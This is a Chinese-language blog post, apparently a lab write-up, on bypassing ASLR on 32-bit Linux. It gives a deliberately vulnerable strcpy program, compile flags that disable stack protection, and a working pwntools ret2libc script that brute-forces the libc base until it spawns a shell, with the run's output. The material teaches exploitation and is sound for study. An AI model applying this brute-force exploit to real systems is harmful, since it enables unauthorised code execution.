NEKO

Linux-Exploit之绕过ASLR - 第二部分

2018/05/24

主要思路是爆破libc基址。
漏洞源码:

1
2
3
4
5
6
7
8
9
10
11
12

#include <stdio.h>
#include <string.h>
void vulnerable(arg){
char buf[256];
strcpy(buf,arg);
}

int main(int argc,char* argv[]){
vulnerable(argv[1]);
return 0;
}

开启aslr:

1
neko@ubuntu:~/neko/6$ sudo sh -c "echo 2 > /proc/sys/kernel/randomize_va_space"

编译:

1
neko@ubuntu:~/neko/6$ gcc -m32 -fno-stack-protector -o crackme7.out crackme7.c

-m32:生成32位ELF可执行文件
-fno-stack-protector:关闭栈保护

查看libc基址:

1
2
3
4
5
6
7
8
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7de3000)
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7d09000)
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7d25000)
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7de2000)

选择0xf7de3000作为libc的基址,写爆破脚本即可.

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
from subprocess import call
p=process('./crackme7.out')
elf=ELF('./crackme7.out')
libc=ELF('./libc.so.6')

libc_base=0xf7de3000
RAM_sys=libc_base+libc.symbols['system']
RAM_sh=libc_base+libc.search('/bin/sh').next()
payload='a'*0x108+'a'*4+p32(RAM_sys)+'a'*4+p32(RAM_sh)
while 1:
ret= call(["./crackme7.out",payload])
print ret,
if (not ret):
break
else:
print 'error'

实验结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
$ uid=1000(neko) gid=1000(neko) groups=1000(neko),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ core crackme7.out libc.so.6
crackme7.c exp7.py peda-session-crackme7.out.txt
$

但是没有显示命令,只显示执行结果.

原文作者: n3k0

发表日期: May 24th 2018, 10:58:41

发出嘶吼: 没有魔夜2玩我要死了

CATALOG